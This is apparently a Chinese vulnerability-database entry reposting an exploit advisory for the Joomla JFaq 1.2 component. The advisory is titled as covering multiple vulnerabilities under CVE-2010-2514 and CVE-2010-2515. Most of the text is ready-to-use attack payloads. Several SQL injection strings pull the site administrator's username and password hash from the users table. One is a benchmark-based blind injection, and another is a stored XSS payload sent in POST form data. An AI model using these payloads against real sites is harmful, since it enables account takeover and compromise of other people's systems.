Joomla Component JFaq 1.2 Multiple Vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1050511 漏洞类型
发布时间 2010-07-01 更新时间 2010-07-01
CVE编号 CVE-2010-2514
CVE-2010-2515
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2010070168
|漏洞详情
漏洞细节尚未披露
|漏洞EXP


# Exploit Title: Joomla Component JFaq 1.2 Multiple Vulnerabilities
# Date: 11 May 2010
# Author: jdc
# Version: 1.2
# Tested on: PHP5, MySQL5

"title" input SQL injection
---------------------------
title', (select concat(username,char(32),password) from #__users where 
gid=25 limit 1), 1, 1, 1, 1, 1) -- '


id SQL injection
----------------
requires: magic quotes OFF, Joomla debug mode OFF

?option=com_jfaq
&task=detail
&id=-1' union select concat(username,char(32),password),2,3,4,5,6,7,8,9 
from jos_users where gid=25 -- '


id Blind SQL injection
----------------------
requires: magic quotes OFF

?option=com_jfaq
&task=categ
&id=-1' union select benchmark(1000000,md5(5)) -- '


Persistent XSS
--------------
requires: a method to manually POST to form

postdata:
option=com_jfaq
task=add2
visitor_name=foo
categ=1
titlu=bar
question=<img src="f" onerror="alert(1);//"

NOTE: cannot be manually input - editor script strips exploit